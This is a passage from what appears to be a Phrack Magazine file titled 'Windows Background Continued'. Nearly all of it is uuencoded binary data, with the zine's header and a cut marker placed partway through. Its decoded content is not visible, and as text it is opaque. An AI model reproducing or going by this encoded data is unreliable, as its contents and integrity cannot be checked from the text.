  15611. M2:&%E(5%1Y"I0=><#@D8X_6M931$8LJ7_@"<;S#*D9+$"-5)7IQC)SZUQUQ8X
  15612. M7-C=&WD5DF[#ID55.IS:,SG#EV`I);EEEB^8`'ID#H>?PJ-`SS?(I/S=`/>MG
  15613. MEW(.CUZU(LK.8NH6<'RXT&3VR37.R6YB16(.&SM)&,U%-Z%36I$DK(X93@CB!
  15614. MM:'1KN[037"3H&P$/DL1^E5)J.HHJ^A),EE%<?:+29(U9]AC92001RV!GI_66
  15615. MM&UMOLKB4J5WL\:-+\Q`Z8`'<_RKDDW;4M)%"^TR'<!"0V<[G!X8X[4D>E75#
  15616. MK;K=6L0>($[Y&'0XR`/P'6J4]+,3C9Z$D?B2^>_C",BPJYPIV@<C')^E;2W]Z
  15617. MH[RQS:H$S_<R_P"&2*B5.UDD;0G?<J:C8V,]F1%&[HN524X3!SWKC9HC%(4)_
  15618. M!(.,@Y!K:BW:S,ZJ2=T`&`#MR/K2J[(Q,9*_0UMN8DL$J1L=X4C&0-H//I]*3
  15619. MG,H:W,+VZ8Z[PN",^]2UJ4F.LS#;7`\^.)D5N79=V/J.XIVKR">02"]%T<#&)
  15620. M`1L'9>>@'3`]*5O>N/2UC-13_""3CM4REXU5T*XST'45;($EN'E;+2,V0`<GG
  15621. M_/TJ7YW*^7&L)V\",$ECG_ZWZ4K)#)K>PN9;K$T#RG/S!GV^G)/;KUJ]/:VTJ
  15622. M4NV73UB`78P^TY;=G.1T`;`Z'CK6;EK[K+C'35$FD-+IMSYUI)*LRMA!(J*I.
  15623. M'H26K4%SJT]X&GGAMMY5F-NHR?J0/8<>]9346[M&D+K1&H-/DN`(-/OC(TC&6
  15624. M29A$%#>^[KT([UD:K9P69ACMYGF."9&DZ[NXSWJ*<O?2L78TB+G_`(1"P&FBA
  15625. M7!GD^T^1G=NXVYQST_I5^`3II^LG7UD=O+M]XB9=^.=N>V>F<\UUDFC9&`QVK
  15626. M!M8[CR/[-N=B;OWGWUX!'?TK`N+R73=3L;Q+?48HXVY6]D+;\\$#/M0"[&U$R
  15627. M4MO&-IIELA2UM(Y-B>K,I)/Z@?A5;3X777M,*Z=J%HGG$,UU,7#$J<`9Z'K09
  15628. M%RS:O#>Z?<ZG%M62XFMTN(P/NR+)R?H00:L79AO;O6IE(2[M;6>&1<??0IE6O
  15629. M_#I_D4Q=2IKMB]RJM'HT]PQM4Q<K,0J_+_=]JY+2S_Q.;#'3SX__`$(4%1>A5
  15630. MZ%&\?]K?VGQYK2?8-O\`M"4\_P#?(%<[JMC=:KIUNFFQ-,(+B=9HXSRLA<D$-
  15631. MCZ=Z"5IJ7M15K^UU:SMB+B]5+;S%0Y+LH^8CUJ2WFFTJ'(4"ZM=)0M&W8^83T
  15632. M@_@?UIB\C/UR*T32M'>R(-L]TTD8/\`)!V_ATJW/'';:MK]_)<K:9*P13;"V6
  15633. MUF`).!ST`_.A#U)&2);C4[J!D,%W]EN$8<`_O/FX^N:DN+FWO+K6O,=4O+:&R
  15634. M:(<@>9&1E?Q!R/QH$<9I%HM]JMI!(0(VD&\L<#:.3^@KK'NK/5)H;B&^$[VU,
  15635. M^L@W(8]D;G!49ZC('-!3N,O[O3X39&[MH[D?;YL$2X\K]YG=@=>Q_"N8UT/_6
  15636. M`&W>^9()6\T_.,<_E^%`1.CTR$W4%A]J@M;FV2,#[:DWE2VX&?E)SGBL>S6.3
  15637. M30]6MHY4)>ZA$9=@"PW$;O\`&F(U]2DTV>SO]-@O"[11(8D9<(#&N#M;H21F9
  15638. MH[>Y@'BS2IC-$$^QH&<L,`^61@FD+6Q3FLFUJ#39+.>"/[/$()0\H0Q%6)W<G
  15639. M]1SGCTK7NM>LS!>R@I+:RWVR2//,D9C`+`?49_"F#UT,+Q1Y!U*$6LZSQ+;1<
  15640. MJ'!!S@8Y]ZS[:6+4+>YL8-#CGV+DW"XWJV.>A&[)[9_.LZFU[V#I:QB7"R:?_
  15641. M^YOH'>5?NI<;ODX_N]*I)MDF4D!,GHIVX_&B.UT8O<T]3L!88G9)FW,I`N(PK
  15642. MNXD')XX(X'^%07>M7=VL2RREC$<IP/E]<8[U$4IV;Z%2]W0Z_P`)VUUK;&5=?
  15643. M-BD12!YI=5V`#'"]^O6NR2&X=X(_M1:!)8]T(3;)CIR0>@;'&.<&N62M+<Z8C
  15644. M/0Z&ZC22",JJL&((#L1[_G5%;19+H&-'C:,$.`,`L><]><9I/<2T0EWH,4UH9
  15645. MZ07$B,K;D.%;'MC'0^GO7&:PTUCK&@?:+..,^<$,D97;("P'`/((R>#Z\$U<T
  15646. M4KV"[:+,VB!LWNCQAK_3%+#Y.)L,P921R20?T]ZW[>XL=:L8KR!G83+YK9!R^
  15647. M?X<'T'!'X4I7:N/9Z',^(?!=K<+YT<C1DOD0HO))!.,]OUKBK6TET[498DD8_
  15648. M8X:-'&\#T.>"?8XK2$[Q<60XV=T&L1RZ9=@023HZL9`)%*$<8+<]2?;/;\.D[
  15649. M\-:2NO0)<W.K2SRQ`JD!12$XQT((!YZXS52=H*5B8ZRL=[9Z%!IZ6WV5$&6_)
  15650. M>N0"Y/<ENIY]:T;B%#&VX?>.6QQ67FS2YE:_=KINF7&H-'YFQ2=G3/;^M>1>&
  15651. M(==&M7QDCA6.`)M5653CU^E:48W=^QG4EI8FTXKI]A%J=K(S7$>Y9X)AE'0@V
  15652. MCC/7`-0^&-3LM-N;J2\C)9XL0_)E0^>,]P/I6UG),F]FC9UB+[99@V\2QN?FZ
  15653. M+2H1+)V#,>%4>BC/%<?B:>00KND?.`H.:*35@FG<[?PCX7NX)DO9]/@N5(.$G
  15654. M,P5E/K@C'ZBK/B&ZU&:Y^QZ7#Y<D`W.XECQ%SG&0<`^W6LI.,YWOH:).*LMS+
  15655. MDK:=]7GBBE!S"F%<1C(''7IFM&XMH(H'$$TEW;#.U57RY(R,#+`]L_Y%.2MH-
  15656. M9K57'6,:+)NNAMQEU);*[1T]^3574+J1@\,1$-NBY)V;2S8QSZ?CS6<5>0;(S
  15657. MP1)ANN?8"M+[-=Q6"71``F((VG!`]3CUR,5TRLK7(BR.>XFC\Z.=I#)&<X<GM
  15658. M)YZ?J:JJIO90FP;NN5H225T-N^@V&W=IHXE<#>0`6&0N?6KT&F13PSO),$*.0
  15659. M$B`X+=O\*'*VP)7W*,]E+&%D)#*Y.&]<5HVE[=Z0Z12Q+-'@2;`W(&/7MUZ&X
  15660. MB5I*PXWB[FG:S:%,DA6W<3,I!A=1D'/K_A7/WKP+)+#`G[HG*[EP5/?!]/:EJ
  15661. M'FO9A*UM"/3F*7L8"[]V4V@=<C&*9<PF";HRAAE=PQD=*O[1'0=`J1*7(D:71
  15662. MCR]AQ@Y_/\JMRR2+&LJKAV(#RRD;RV!T`Y`^M2]64M"VT^H742K/)"=@R))H/
  15663. M\$]NOXU49Y0T8=IA*N"K;@3G\L_3TI)):(;;>Y)_:,S8,EQ+(5Y^;DYSQS6IJ
  15664. MI,D@N5Q)(4CYV(`6]023T_#%*4+)V'%W-9"UEK-K(L[PS/*5,LTO&!C"YQP.N
  15665. M?2J_B$3F]5[@KO?<<*Y88SCOR.G2L8+WDS5%*SU"\T\L;.YE@W_>V-C-(UW<)
  15666. M-YP:XE83$&7+D^81T+>M=(QT=]=PE/*NITV*53;(1M!.2![9HN+RZNPOVFYFG
  15667. MF"\KYDA;'TSTH"R$^UW'G^?]HF\__GIO.[\^M/:_O'VE[RY8J<J3*QP?4<TPK
  15668. MLB%)9(U(21U#$$@,0"1TS2F63<S&1R[##'<<M]3WH&*;F;&#/+C&,;SC^=0\$
  15669. MB0$$@B@"3>V?OMUSU[^M6;:WN/L5U>PS>7'`563#E2=V<=.O2@![Z;=VUQ#'\
  15670. M$K2320K,OD9)"L,]JA2UNK@LR03R8)#$(QY'7-%A70GV*Z\U(OLTWF2#*)L.1
  15671. M6'J!4<L4D$K1S(T<B]5<$$4[!<E6QN6M6NEMI3;KUD"':/QJQJ&E3Z3':M<$:
  15672. M!KB,MLVD%1TP3Z\T"OT,\TW:-Q.*!B@8]*3`Z=J`#`SQ2$4Q!1CB@`(HH`0U8
  15673. M>O\`6-,71K>WB23[5;J"P,K[&)/(VYQ]>*RJQ;M83:2,)X[&>ZE(E,*<!%494
  15674. M&3]3TZ_E6_IWA&-GBDU`/]F8*T<L'*N/<]5/Z>]9RG**,XP4F:NHZ%IEM"7L9
  15675. M]25EB_>/]HB27<,<8+<]CCG!K#U/3-,FLXQ::A:O>9^8)!Y8(^H/]#64:CO=$
  15676. M(TE#2Q7T<ZM9R-:V+%6D&-ZD[>2,D8_IDUZ=IWAZ1HQ(+E(YF^9IEC=6=NH)>
  15677. MR_;G&1Q14MS:=2H-I:FH;B[T\1^>(KB/&#,H(DSG^[SD?CV-4D\007,[SV4GV
  15678. MFDJN;=R4E&"0=JD?,>G&?QK+H4DF:EE=PRQ.8I00[$J0><^M<UXRLI-5L+2W=
  15679. MM0?M(;='MQD$'U[=,_A3C*TD)Q98\*7-Q&DL,XV3Q(J3J1@LW+!OJ01P>:J^A
  15680. M$IKZ'3Y;&.*!8X9Y(7F9\%!NSM`Q_M'')_"J=M;!U-?4=1A@CD^1HS@R;G7<0
  15681. M``!SU]*\I&E7.L:E<WM@&\@REE9AD.1R,`]:=.2C>3V)E%NR.N\J75=%6UNV9
  15682.                               ==Phrack Magazine==
  15683.  
  15684.                  Volume Six, Issue Forty-Seven, File 18 of 22
  15685.  
  15686. Windows Background Continued
  15687.  
  15688. ----------cut--------------
  15689. MM);D,=P$9R.F3RW7WQ6-H=GJ&@:W++96XEA&%\N:7:9#UXQT/IFE"<4G%[%.<
  15690. M+NFCT6P\465[%.V&A:W4&595P4)['_'I7/P_$JSGO)(C;D!79,[@=W(`(^M."
  15691. MTF[+H3HMR#Q]NO--B>V(",NX#=[5Y3NP2#6V'=TS.JK-'1:9>Z=(QM;MI(X6?
  15692. MM3&70$[7]?7'K6';^4=PF+#CY=O<UI%25R9-.QTNG1ZMKVF"P@:"*SMR0TN-I
  15693. MID]L_P"?>KVA6]EH.NN]\T4:QPY4LP[GM@GT_6LI-*\([FJ6TF;.J^)Y9[8_=
  15694. M8=UE8,-KWLG#D=<1KU_$URNB76GZ6]W>SH)``1&@.Z09SR">]3%-1:075[LA8
  15695. MU:^A.HK<16:6X8GS81PA/T'%.LM7N(H9H;>2.,.6DD)`^8=U&1[#`]JTM[IG\
  15696. M?6Q9@L[>YMWN-/N&<Y(Q@C;CM@Y[8YJM#8W-_*$?RXXMYR9BN#@$YSVXS]*R2
  15697. MC+5WW0VNQF(H^U'?$N%Y;<H[>U+%)-%=?:2`=IR&?D8QQ^5;O4@V;91>V\GD7
  15698. M0&YD^4Y!^9CDC!^O%)-8E"PNOL]BX0A8]I+DGC''UK).VGX&T5=#SH_E3Q-&?
  15699. MIEC<;@H^4A<=Z@MK0#4BKJT:9+*N,<X-4IW!P2#[+&-6@AN"ODB8MP`1@\_SF
  15700. M`K1T[2UU&YD(N?)D#<B50V[GGM]*)2LKB41^I^$OM=^T5G(LS1J`Q4JI5OKV-
  15701. M%<YK.CZAI:O%<K'*JMEY4"N5..C,.>].%1.R9,X-:F*C[&5P<%3P1UIZEY[@I
  15702. ML2"S')9^1^-;^9DCI['3/LL+7+V']H6X5M\LD;)M`'ISC'/2M'4(-.O-(@B@/
  15703. M@BB,9W2;"$#@=.0/0GKSR:Y>9\U[G0HJUB*'0+:73/.QB-G`90V613SQ^E1OQ
  15704. MHL[Z:#+"V]%+*@8?N]O#$CMG&*I38.")+/PG'<;MMU&\@95VJ1\N>Y]:['3_7
  15705. M``QI^G[620.P5E&YASG'./48J:E1M6",$B/4O#<5_/(]S*51G0AN<C@@GTR>1
  15706. M/RKG/%-M;6UW`+21GC9"26;=SG'6G3E=I%6,(4ZN@88HH`!2@<T`&/:E(H`0O
  15707. M#\J3'S?A0`NVM;2M5.F:9J$<3E+F9H_*.P,."<]>.]`FKJQI2:[;7:21R7$][
  15708. ML\UO`K7,<?S!T^\,`C@Y[5(WB>W^U))&;B-?MRS.%X+QA`IS@\DD9Q03RLAM,
  15709. M_$=N$@6X,TC;9T>1EWE0[`KC)YZ<BLO6KZ/4+U9(2Q1(UCW,@4MCO@?U]*8T9
  15710. MK,OV^M6D5M;NZW'VFWMGMQ$,>6^[/).??D8YQ6;J-Y'>"S\M7'D6R0L6QR5S[
  15711. MR/;F@+6*)'%)CD_A0,7%)VI@&.*0@^E`"8I:!!BEQS0`A&T<BLJ>S$DUR\DHT
  15712. MCV@%=PX;CIGMTI-V,YJY6ACDA=9%174'OR#[5J'Q5J:3!XY2A`P0``.!C&`*,
  15713. MSE",]R(R<=B[%KMUJHG1K='9E^;.U>.,GG_=JWHVCR/J4$UW:"-6.Y(E4$L!5
  15714. MR"O.*YY)4TTF:1O)IG537T<[1PO9[FD.`[(.3D9;'?J.:ZF,&VL@\TFW;C=CD
  15715. MVZ@>]<RT1N]CE]<\5&)MD4;NJL-P5L.#_*H+_5VOHH(Y[9XB`)%=H<,G.3M[<
  15716. M@_2JC%VN)--V&Z<-4\V5;>56Q,0QVDX.,`'\?PK8TA&DNU>2Y=KA(A(H&-H!P
  15717. M!&#^.?RHE;H7T.<T]YK35M0@6262#82&D;&XA3M.>WUK0TN&Z@M=MO(YW,'&S
  15718. MU<Y<]6?."1T`'4X[]*MV9.IA:Y>F]\NVC9U53MF9@R@*.N<Y(Z>WTJ)_$<)MO
  15719. M4LX(_+(&U&8?='X5:IW5D1SV.9M[N[LKAGANVB8'[X8Y_,UJ'Q1._EB?YROW`
  15720. MF'\7O6TJ2D[HRC4<=S0N-7&J[8XH?(NE)5+C.'VYSMX^\/8G%<E<;EN&(.,'_
  15721. MDC(ITERZ,*COJCIK7Q->O!'$5+1[=K.6P<CG@X].U.U[0;+^S!J$3&"=CGRY[
  15722. M'SO&>H(]JR2]E-6ZFC_>1N8L%A%;H\U\P81.5:.-LG(Z#(XY^M9G4D@`9/3T?
  15723. MKJB[OR,&K6/1;;4H8-+2UT.U>\:%-K3L-D*G&3SU/.3@5Q-[-)#J9-P5GE0_@
  15724. M."HVD_3&*PI+WG??\C2H]%V)1?PJD@6UMVED7&73)'N/3\*H3_(P7.!],5O%J
  15725. M-/4SD[CSYB*TK,I1SC!.??I3)")=HY)'.!0EU1)MV5RHL7C6=X&93O55RKX(!
  15726. MP"3C'_UJSWM9TY*HBE=[$'H/?\ZQ2Y6[E/5"1011J1*_F;CU49[>OM1(8HA(N
  15727. MC3.8WSA003[`FG=OH+8+#*C?&6VKD\.5Q^(K>T>X:U5KTI).C'8PSDL1W!/.[
  15728. M![4JB31K3=CHM1U^1=/BD2%[4,BF+<5Z$=_;%<9#J$5K="XE1KJ4XP7;@'Z5V
  15729. M%*GH[,JI/8T5\2&UB9H(H8I)#G=LW$<YZFG6?B>>5MTQBD7EMHB5<_7J:IT>1
  15730. MI*J:EE_&4Q7R(K95WC)4(,8//I[UFW^J2WMC<1.@3))&SA>W'Z41HJ+N-U&U*
  15731. M8Y=X'C`+*1GD"M?1(K?S0USM193U[(G?WK:3NM#*.C/0])66'08R4)9F=(HBJ
  15732. M-QV_4?UK&U.6".[DE@O8DG6(*B`9,BY/R-[``<]L5Q17O,Z6[1(6\1VG]ER[?
  15733. M1)YY7"1O@@`'N1C/)].:SO\`A)91!&(U2.1%Q)OCW;S[#T^IKH5,R=0KR^*K$
  15734. M\RNT.R,$;<;`#C\*;+XFGFV++!$X4?W0,_I5*DNA/M&*NO[)#(UA$7VXSO(.'
  15735. M"/:K$^JRZND+R1K&L2^6JKT`Z_UIJ%G>Y<9W=B`"G>]4:!29QWH`M:?83:B\`
  15736. MT=N5WQQ&3!_BP0,#WYK0;P](ERMJUU$+EQN6,*W*YP3GMWX]J8KV%?PW<+=ME
  15737. M;I*CL(FDSL(Z':!CW/2JUUI9M[3SUN$D*B,R)M(*;UW+UZT!<H4G\5`Q<U8M[
  15738. M;7[3%<.9-ODA#C&<[F"_UH`U6\/1J[(;ULQR%)2(AA`&(R1NR.G4C'/6E_X1C
  15739. MQ712ETPDD;;"'5<,<*1R&YSNZC/2F1S$5YH262DR2W$F]V6'9#U`4-EAGC.>D
  15740. MG;!-27.AVUM/<*9;F58"JL(U4LQ+8X]ACGZBF%QUMX?ADN%@EEN(R%$CR&,!Q
  15741. M<$XP!V8?4]".U5-8TC^R5M0TI>24/N]!@C&/J"#2#FU,LYH'!-!0A-:&CZ8-!
  15742. M3FF1Y/+"J`K9`&\G"CG\??B@3=D7X]&M#<I;E96E$*NZASD,0O!`3@<GIN]\3
  15743. M4-HMC&RQ,TC7(4LL2R`F7&[Y>!@=!R"<^E.Z)NS%O(?L]RT9B>$@`^6[99<@1
  15744. M'!/^346*!AM]C28%`"'KC\:SKR243L2T;1PX81N>I(]._2E(F6Q;T[6[6V2)4
  15745. M+F)Y06W2G&>_8<9X`SDU?TZVTG5KR8.I5601Q+W#'OGIG//XGTKFDI0O)!&4]
  15746. M9:,WO[(@T^TBM1*B/'B1Y-H<'(P!^C?Y-;-D(+C24'VEUD$9``D+!0"?X3G'M
  15747. M%<<I7U-EH9OVW4;!E<"RU`L`5&?+8#H`.H/0\>M9NL>.)9QY%S;26[8SM?@CF
  15748. MVZ?K50I\_P`+^1G*;17\.V>HZM=AH701J^_S6;.<#'`YYY/.*M)++IUXT+E9\
  15749. M2C*S&3YCDMR23Z`?^/"KE:_*BZ::5SL]#CEAT=&F8%I!ECCA1@_GS5G282@NW
  15750. M6B"LJJ`KYY9LG.?;I6#W+>S.6GMX9_$KZ?\`9V\F>)EW`D<X.0/<G'T`J>ZTY
  15751. M^Z>Y>SB=9%*[IV8E0!G:%X[8'3O^.1?-L,P-66QACOK=9EC=(RQ6%AN<^Y)P^
  15752. M1[`=\YKFKF+[)9:>2H0S+YS,5Z\G'/7I]/ZUU4F[:F$[7(KY(_/V(0/D#'ZU?
  15753. M76RG+;8E+Y`.`.QK:+LM3*4==":*.\BN$)@D+9X51S6A!;322R7K6H6/&!'-0
  15754. M;R,N?^`KCM0^7HQJ_4FD\/P3-&=*U%'$C$2QR`#8P]EZ#MFM-PNBZ4MIJFEO,
  15755. M9I<RKYMU%+YB%`<D8'0G&/QS64I<UH[/\RU'EUZ%3Q181W5I!J]F4:*4`$1@P
  15756. M<#W]\_SKE`IWA2"#GIWK6D_=MV,YKWC8MM9O%MFLHY)B&^2-(OE`)&```,]?>
  15757. M>KM]8VZZ/&KM:031*`R_-OW?GS4\O(]"T^9:F))%&%$N]G;C"!=N/K[5)?L",
  15758. MA,BJ)3@`!\[1Z>__`-:M>QGT)X8+4V1B.W=O#[AR>A'\STJNN!(0.(U!]BQ]V
  15759. M/\]JF,FV[A9(GLX/M`:*1\&1MRQE>&P#SQT7_(J]J=A=K8HTLF?*7)0JN%&>%
  15760. M![GO@U,I)22&E=&5,7&54[&8?="XR.U6(M$DDAADD9E:4X52G]?R_.AOE0DK$
  15761. MNQ8O8+6&9TAD\F*/*_*<@D<9_&J#3&-1Y=W*0%)^3C`IPU6J'+1Z$JZ;<W`1^
  15762. M^2FS<.20`,?XU5-K(FT["<]`0<G_`/75J2Z$M,O26JB#;+AYV(.%(.#DYS^&V
  15763. M*L6,/E6HDCC(W$8('^]Q_GTJ)/0J*U+5G87MY"DZ1.T3`C.!Z`?I5JW\-7TED
  15764. MA.[O&(@2Q8L#D=L?D?TK-S2T-%%V.5DN/W,A=P2!@*1R?QK9M[6Z"03+%'/#A
  15765. M$H#8X4``#DGC/M3G:*U(A%MZ'5:WJS6/A6ULE"QW$L.]UA)'EC/0$>O`KSU%O
  15766. M+SC`SSDX_K125DV.IO81X),"1D90QQG'Z5+8H)KH1-*(E8'<Y_A&.?TK5O0A1
  15767. M+4LRQ+<&&&RB7S[@[F2/^$9^53Z>_P!!5&:RN(KTVCQ.9PVP(!U^E*+Z,<EVB
  15768. M)-2@FL[PI<Q/&Y5>&ZG@#^8JSIY_T<X_O&J3T0X?$6L4M(V#M]*3%`#HIY+<V
  15769. MMY;E"PVDCTR#_,#\JNG6;]F+M<G<6W;RJYZYZXR!D9QTIAH(FHW]L=B7$L1#K
  15770. M;\#Y3G);\LDG'3FDGO[R]B$4TK21ISM"@`8&,G`[=.:`T*N*3&&%`"X]ZEM[8
  15771. MJ>TD,EM-)"Y&"R-@XH`D74+U41!>7`1&W*/,/!]::]U=SS*QN)Y)=V5.\ELX8
  15772. M`R/?``_"BR0%M-/UE+=@D5VD!785WD`CKM(S]>*@EN-0AG'GW%VDR`@%Y'#`Y
  15773. M'J.3TI>ZQ;D(FF6-8Q-($4Y"AS@'U`]:8SLP&YF;'3)SBJL,0"@CG\*!"<>E+
  15774. M.BB:9V`*J%&YF8X51ZDT-V5P$$EF"/\`B80`XS]R0?\`LM()+%B%&HV_/`RC`
  15775. M@?F5IVG_`"O\/\R/:1[CI(&A<HZX8<]<@^X]:3%"=RA"/6C'YT`(O))]ZKZOE
  15776. M?0?V;'9R6)\T$NEUO]>P&/ZU$DW:S)D]#&M+.6\D:.%2[A2VU1DG'M5^*Q1B.
  15777. MAAGA92"#O7&2.H!(`S2G*QDD=9I%QINGB$:@EO)$J\.GRO$PZ'>!DC&1P3C\J
  15778. M:66ZTR:RG@FO9(VSE&642;\]P>"#ZUPR4F[V.G1(JZ7I&FZG,DMUJ;NG&0S!7
  15779. M74CH"?Z^U7;[P.PN#<VQ^T0L-S+-G<_?KZXP/ZT_:N+LU82IIHZ;1K&TTL1BY
  15780. M.'R-Q`W8QN/<#D_Y%4]?TEGF>6,EE\OY4XX`/4^WMWXYK&+;=V;[:$)ENYK*?
  15781. M83W1B:4XCYQY:`$9'UR.M=%HU[:?V9,T,T9*\2;>BD?_`%A4NRV'):$=G:PGD
  15782. M4/.3(="6=CQN;H!].:;JUG"]H\=L_E&1LLZDL<GUYS0GH)[G-Q>&&U%Q#-<J*
  15783. MEJKY;RF4<]`N.O'/YU+KGA"*[OH,S`0PQA%39T`Y/.>>O2MU5Y;-$N*;L2GPK
  15784. M?I,]PC%1OB`#,X8[CTY`]_0UK#PII;1;H$1`%VDQ!D)'X]*E59-:L32B[V(;O
  15785. MC2]%A8[HXS<,P9B#AN/I45M=NT\JPVLC6JL,N&SM.>0,]LXJ5*[U+2=B75M+Y
  15786. MTZ^E$EU803!GP9/(R_XL!G%4X=$LH89UTNXNK0`D>7`^Y&/?Y&)4_I5>UEL]<
  15787. M43R*UT<;K6C:II<<LXL#'`V1*\`'E.OJ4YV$>W`[8K`NKH3ZF]W&NP,^]5STN
  15788. M]J[Z;4E=,Y)73L7;:1+K4XYGFCC`;)PN]MW<X/4U=U"[22>!+:2[>X4'$DN0&
  15789. M$]E4@<^O2AJS2*3T,BZMYK=\3,?,90<*PW'/3.*M6&DI>W0^V3)`K=PWW?KZ>
  15790. M?C5N22NB5&[LQNH:<--\@,51FPY(.3@]#^AI[-`\Q**I`P(DV_>8XP/J>]9*8
  15791. M3:N*R6AIF!!,9K7&2OENT9)W-P#M'7!/^<"M:;2KJ\B9[C=#:@L6SR6'&!]3W
  15792. M^'%8SDE9LU2+>DZ)::?HIGOUBCNI"W[M\?*`>!D\U;4PZS,D=FICC@'R*ZX(*
  15793. M(`X//3(_*LI3;E<N*LC#;PE<V_FI;.9?,#;I,##$]%&3G&<5D_V)J,#S>3:RN
  15794. M,T4>YVC&`&QR`W?MTKHC53W)=-K8W;+3#8V2+)9R"68#S9&4;4#`<<]\_CUJD
  15795. MW9^']\<0C9)/F^<X.$`Z$`\9QQ^=8RJ6N6H%J?PS'/*)#(/*C!'EHFWSCR!NH
  15796. M.>:NC0+.XM5MY$:%+=AM9#T^7'!]LG\ZGVC=BN6Q8FT1GB-O:S/;6GE[!M&"R
  15797. M3C&1FH=?CL]#T"]G#F2;RR(A(<[21MX'XT1:O8&W8\7/)('/85ZA?^;>FUAL3
  15798. MY+5-,SYFQ%RK$'D'../\*Z*^C5S&CU,^Y\-7-P\]LUP^PL"DI0E>%Y4<^U0S3
  15799. MZ#;:9#(OVL1I+&@E,BDGE3]T<<YSQG^53&IT13AK<JWFB02WT4>G3.1(5\T2*
  15800. MXSAL8(Q]2?6J&LZ,;"YFCMRQ12(TWCE^,DC\OUJXSU29+@3:?HUQ+87<D+1KH
  15801. M*;=63!((VD$D?7UJ6VT^^L2;U66=I1LCE?YGB)'?/?J/P-#FM4QJ#W,G5K>0H
  15802. MWTYD<R-G#.S9+$=3],]*DL8FBB9'ZASS6T7>*(BK2+8%<U`BCZT#)XKE[N
  15803. M:ROGB(#+"&&Y0PSO4=#QW/YU!)>:K%I0U`01VZY&)!9J,@]"&QQ^0]C6].*:?
  15804. MU.:HVGH.@76)-0DLEDDO3'&)&+QK*5W*#C+].6QU_"I[*[O9K35(;S,;0&-?I
  15805. M*V!`F6(/``YX'-7.,;-HB#=TB`]*:<[QS@8Z5S'6.%)CWH`55+$*O)/`'O71K
  15806. MW#0>$8;82[6O[A=^-I;8/5L<A1TXY-%KNQ$W9%-;[5"0IU!`HV$0)&I28G()6
  15807. M#%<C`QU!SZUH:?<0:[.-*U%E%S@[)TC.POC)"DGKT)'0CL.]-J2T_K^O\S)7+
  15808. MB[G/W=L]G=RV\HP\;%3CVJ$U*=S</QII'SYR>E,!:<5\RQNX3T,9D_%/F'\BV
  15809. M/QH;MJ)ZIDWAS1;34[ZT,UN&2=R6522J@<D?I^%5==TE-(:8K#EHI3'M.2O0D
  15810. M_,/RZ?3TKMYM;'`69T$7EPJ<K%$BK_WR/ZDU":X8NZN=^PE(>>@QG@"F`WI@F
  15811. M"KVFV:ZHK64J;USO3(X#'C@^N.0..AK.L[1NN@TKLUM&\-?8IE1[:*-9OE69:
  15812. MLN&;H%([=SQU['M6/XKTC[/KB`6B1J$+!$7:'&[V^O6N2,VYWN.4$HV*>IZ$R
  15813. M+73(KO3[HSK$`TB@DH"W`V^N""#D`].O;GVGFEW'&%!W$`<9KIIR4U=F$XV=?
  15814. MC8T'3;J\E+0L@51EP3D8]Q7J-KJ20V4,LS,6VJI0'=D@`'W[URXAIRLCHI1]M
  15815. MT='*FH2*@8JA?>AV]<`'^M)J$L\DC6\4+*N`6F##Y>>@'K7-L;=3,EMITN7,M
  15816. MTL`.=Y!QC'.%/Z?E4-I;7.B6HCB`*SRYRQR"3[=JOI8>CU->WN)TTP2H0LCG:
  15817. MYAC;GZ'UJM*;R".$Y$P'1A\I/7CZ\<U-K,9?\J^M[I&%O`R%MS-YG3/)X]>*)
  15818. MS]7CU*XGN'BAA.P;ED5N&`['(ZU2MU)31OZ?:NMG&6*@L"S$#(Y]*DEF@M8FZ
  15819. MDDD)VG;@#J?I0U8C=Z&"FD2WVJ)J$Z*'6(JH#_=;L<8]/<U1U_[>CPVUC;D?:
  15820. M/ACOVAL]LXIJS:OL7MHC<>;[+IB/-:W+.-K%54.6_(T]9=/A(S<1Q2..KG:WN
  15821. M/^]]/TIJ#>Q#9#YL"LZ)>Q3I\WS/-'A1Z<'I^%>.ZK!#;ZI=0Q86-)"$`.X8,
  15822. M],UUT$XMF%5W2.C7Q+!9VJV&CVLF-@#R187><<G<1D<UGR37EX'DGO8(/+4$R
  15823. MB)MS?IP*J-/E]Z6K!SOHM$06TUA!&&^S3M*/^6D;DDG\P:>VJ6L,SM$DI4\;C
  15824. M&9NGYU;C-L2E%+8758Y8=.ADG0@I^Z52P)7C)&,\#OVZFM.W\+Q:K-!;0:@L\
  15825. MDR('GGC3]W$N.%[;FSQ[8K!R<4F"C=ZFY8V.EZ5-'9-++=W7*@J^Q5[GGMC'G
  15826. MZ5IW$=M+NBW+)<A0RY8KY8`_C/X?6N5MR=V;I6T*=U,(;@136[7,C*`QP!O8I
  15827. MCL.V#_6FC7&BG"7NEX8\(3*-N.G;K^&:25^H:HV]/"+:!IE:$'Y(QCGGMQT_K
  15828. MSTIZPP6]F_D85';/+X#`=`.>O^%.(R"V>2]N8_/G"1J1((40J,`XR>QZBK<T5
  15829. MMLRNBIYK]<#C@<]:'HAI:C8F@MH&'V>,KO.X;@$7/7D]?I3EG$CHP\@0J?D9E
  15830. M1Q]>F*%(;CU(;G4KF2>.*(H&)P'.2N.,]*Y[QN+6XT2ZE*M)/&1B3!&"2!T_D
  15831. M"KB_?B2U:+/-+5!)<Q*2%!<#+=!S7HOE00PI&TZR)GRPZ<+SR2/R-=.(;NC*^
  15832. MALRTERT36L-]?1,C`_*"68D,"/KTQBK5G:KJ%]-(R>>L(V$.=P#]\#H/3/M7H
  15833. M,]%=&R,[5+"]&KB`QDNB$M'!\@VC@\CIUK2VVD2+%!9Q@N`9WD&[:V/7I^/%Z
  15834. M$G9*P+7T([B^LX%BC2Z1`8\R".,<CUSCI@$4DVNZ9>-\\F5MQO90@)`R`*E*2
  15835. M6XW9&=8Z+:>)+W[3LDB@*+Q#@!6!.3FJ7B"Q^Q:@HSN\R)7_`$Q_2NFG)\_*M
  15836. M^AG9;F5BBNDD*;0!:M1%':75Q=1/+:QF(2JHZKYBDC^5=G>:G]NM0NF/!>+>U
  15837. M1,(S.P4#C!4J!SQDX.,8JW+DAS/9'/-7E9%6RNYK/5;G3WB1+4$.USG:00H!K
  15838. MSG[W3'MFLS4;ZUU2^U>XT\/)&EM''-*P'SOYF0?P`Q^%7>ZNB(Z-)F'@XZ4AA
  15839. M'(XK(ZPQQ2=J`+NC[/[8L_,^[YRY_.G^-H;^\\974=KYA80QKM5L94XX]QN-"
  15840. M73:4M3&KT-+2=+U1+"XAND@*.(P(Q=,N#GY@<`]1Z=,5A/I>KZ5X@L)+R15FY
  15841. M:[0I&CDC&0`1VQC(]<#FM$H032UN8\S?R-OQ@$'B*?9W5<_7%858(ZEL`IN/_
